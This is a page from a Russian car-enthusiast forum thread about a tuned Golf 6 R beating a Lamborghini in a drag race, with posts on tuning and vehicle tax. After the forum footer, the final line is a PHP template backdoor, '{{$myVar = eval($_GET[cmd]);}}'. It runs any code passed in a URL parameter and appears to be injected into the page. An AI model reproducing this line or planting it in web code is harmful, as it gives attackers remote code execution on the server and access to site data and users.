+ Ответить в теме
Страница 6 из 6 ПерваяПервая ... 4 5 6
Показано с 51 по 60 из 60

Тема: Golf 6 R HGP vs Lamborghini (Unlim 500) Смотреть в хорошем качестве.


  1. #51
    GTI-Racing Grisha is a jewel in the rough Grisha is a jewel in the rough Grisha is a jewel in the rough Аватар для Grisha
    Регистрация
    03.04.2007
    Откуда
    ЗЕЛАО
    Машина
    MKV R32
    Сообщений
    1,576
    Цитата Сообщение от BON Посмотреть сообщение
    я вот когда еду, мне тоже кажется что у меня 700 сил и мне это даже многовато )))
    Ламбо кстати и не намного так отстанет в повседневной жизни от гольфа.
    мощи как денег никада не бывает много )) ибо к хорошему быстро привыкаешь (читать в контексте разумного:)
    насчет ламбо, то отстает, но не по всем пунктам )
    AtmoBrothers

  2. #52
    Кобрабля 2esco is a splendid one to behold 2esco is a splendid one to behold 2esco is a splendid one to behold 2esco is a splendid one to behold 2esco is a splendid one to behold 2esco is a splendid one to behold Аватар для 2esco
    Регистрация
    27.12.2010
    Откуда
    Moscow
    Машина
    Candy
    Сообщений
    2,288
    Цитата Сообщение от Grisha Посмотреть сообщение
    думаю хозяину гольфа HGP он вполне был доступен..
    опять же, все люди разные, кому-то нужен, кому-то нет.. для кого-то гольф это статус, для кого-то и ламбо это не статус..
    ну я на личности не переходил и тем более написал "оч редко" намекая на исключения из правил)))
    но если ты так хорошо знаешь владельца и его возможности) значит он и есть данное исключение)

    п.с. какая нафиг практичность бро??? люди владеющие такими авто не думают о практичности т.к. практичное авто у них тоже есть))))))
    ну в остальном все верно! тачка огонь) но я просто удивляюсь когда вообще появляются такие попытки сравнить несравнимое!!!
    тачка наделала шума и это здорово и это естественно!
    а владельцев суперкаров, которые ездят по киевке роллом или на анлим 500 да еще и удивляются (брызжут слюной) тому что хгп их проезжает(а не знают почему именно проезжает, что за проект, сколько стоит и вообще кучу информации об этом авто) я вообще никогда не пойму.
    человек должен любить эту всю волокиту и быть в теме если вообще тратит столько бабок на авто как участники анлим пиццот(например).
    Последний раз редактировалось 2esco; 05.06.2014 в 14:18.
    Провокатор^^

  3. #53
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Осталось только, то чтобы машинки такие ездили без технических проблем.
    песок сыпется....не останавливайтесь на достигнутом !

  4. #54
    Модератор GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold Аватар для GreyRabbit
    Регистрация
    26.07.2012
    Откуда
    Москва
    Машина
    GTI edition 35
    Сообщений
    1,233
    HGP - конкретно спорт-кар уже с возможностью ездить по городу и даже на дачу с 5ю друзьями(как на треке он - не знаю, но в драге - все отлично). Кто говорит что мол дорого - не понимает суть зачем это все, а понимали бы - вопрос цены не вставал бы на первое место. Возможно для кого-то секрет, но большинство в этой стране считает, что хот-хетчи это тоже дорого и нахрен надо когда можно Камри взять за эти деньги, а гольф Р вообще 1.500+ - за эти деньги на вторичке такооое можно купить, что вся деревня уважать будет. Глупо вообще говорить что он мог за эти деньги - он прекрасно знает куда может деньги деть, лучше нас. Что и кому хотелось бы в гараже за эти деньги иметь - ваше личное дело. Вместо ваших авто многие бы тоже "лушче купить то-то" сказали. Покупайте и мы вас тоже сравним и обсудим! )))

    Можно ли сравнивать авто? Смотря в каком контексте. Мы говорим о спорте, а конкретно о драге и тут сравнение на видео наглядное, так что можно.

    Мне же факт сливания стокового суперкара гольфом очень приятен - доказательство того, что тюнинг в нашей стране имеет уровень и на просто дорогих авто на подобных соревнованиях делать уже нечего, а нужно думать проект и что-то таки строить.

  5. #55
    GTI-Racing Muskat is on a distinguished road Аватар для Muskat
    Регистрация
    18.10.2011
    Откуда
    Москва
    Машина
    GTI 6
    Сообщений
    95
    Для тех кто не верит в управляемость(не только езда по прямой) данного авто.
    В инете есть сравнение на время с BMW manhart mh3 и pp cls 63 amg.

  6. #56
    GTI-Racing Phobos is on a distinguished road Аватар для Phobos
    Регистрация
    15.01.2012
    Откуда
    Нижний Новгород
    Машина
    VW GTI 6
    Сообщений
    230
    Golf R - это тема! Но вот налог в 50тыр не катит.

  7. #57
    GTI-Racing Gautama is on a distinguished road Аватар для Gautama
    Регистрация
    27.08.2006
    Откуда
    Klagenfurt
    Машина
    KTM chicago
    Сообщений
    485
    Цитата Сообщение от Phobos Посмотреть сообщение
    Golf R - это тема! Но вот налог в 50тыр не катит.
    в Австрии налог 3+ к евро на эрку, радуйтесь, неразумные.
    Куренье -Яд, а некуренье- Нет ©
    Gti mk4 - sold
    Gti mk3 - sold
    500SEL - sold
    300SE - dead

  8. #58
    III место Лучший Пилот клуба 2011 Гера has a spectacular aura about Гера has a spectacular aura about Гера has a spectacular aura about Аватар для Гера
    Регистрация
    08.11.2007
    Откуда
    в Москве
    Машина
    Nissan Quest
    Сообщений
    4,674
    Цитата Сообщение от Phobos Посмотреть сообщение
    Golf R - это тема! Но вот налог в 50тыр не катит.
    Рожайте 3-х детей - тогда одна машина на семью налогом вообще не облагается! У меня три дочери, так что пришлось продать GTI и купить Nissan Quest 240 л.с. Налог - 0 руб... ;)
    Golf V GTI МКПП + REVO k04 Stage 3 + Quiafe LSD + intake air system K&N + sway bars H&R + BSR down pipe + APR`s exhaust + сooler autobahn88 + водитель Сергей - продано...

  9. #59
    GTI-Racing Phobos is on a distinguished road Аватар для Phobos
    Регистрация
    15.01.2012
    Откуда
    Нижний Новгород
    Машина
    VW GTI 6
    Сообщений
    230
    Цитата Сообщение от Gautama Посмотреть сообщение
    в Австрии налог 3+ к евро на эрку, радуйтесь, неразумные.
    Да что мне Австрия? Мы в России живем, надо смотреть реально на вещи.

    Цитата Сообщение от Гера Посмотреть сообщение
    Рожайте 3-х детей - тогда одна машина на семью налогом вообще не облагается! У меня три дочери, так что пришлось продать GTI и купить Nissan Quest 240 л.с. Налог - 0 руб... ;)
    Не катит :)

  10. #60
    GTI-Racing 01RUS is on a distinguished road Аватар для 01RUS
    Регистрация
    19.09.2011
    Откуда
    Москва
    Машина
    VW GOLF 7 GTI
    Сообщений
    479
    O1RUS

    GOLF 7 GTI OEM

+ Ответить в теме
Страница 6 из 6 ПерваяПервая ... 4 5 6

Похожие темы

  1. Продам диски Lamborghini R19
    от Леонид в разделе Шины/диски
    Ответов: 6
    Последнее сообщение: 03.01.2024, 20:22
  2. Lamborghini Gallardo
    от str1ker в разделе Шины/диски
    Ответов: 6
    Последнее сообщение: 03.01.2024, 10:49
  3. Unlim 500+ Осень 2012
    от FEES в разделе Встречи и мероприятия
    Ответов: 18
    Последнее сообщение: 13.03.2019, 00:16
  4. Суппорта Lamborghini
    от Pavel095 в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 22
    Последнее сообщение: 07.04.2013, 00:02
  5. Айфон В Качестве Приборов!
    от ajiellika в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 4
    Последнее сообщение: 19.02.2009, 12:19

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}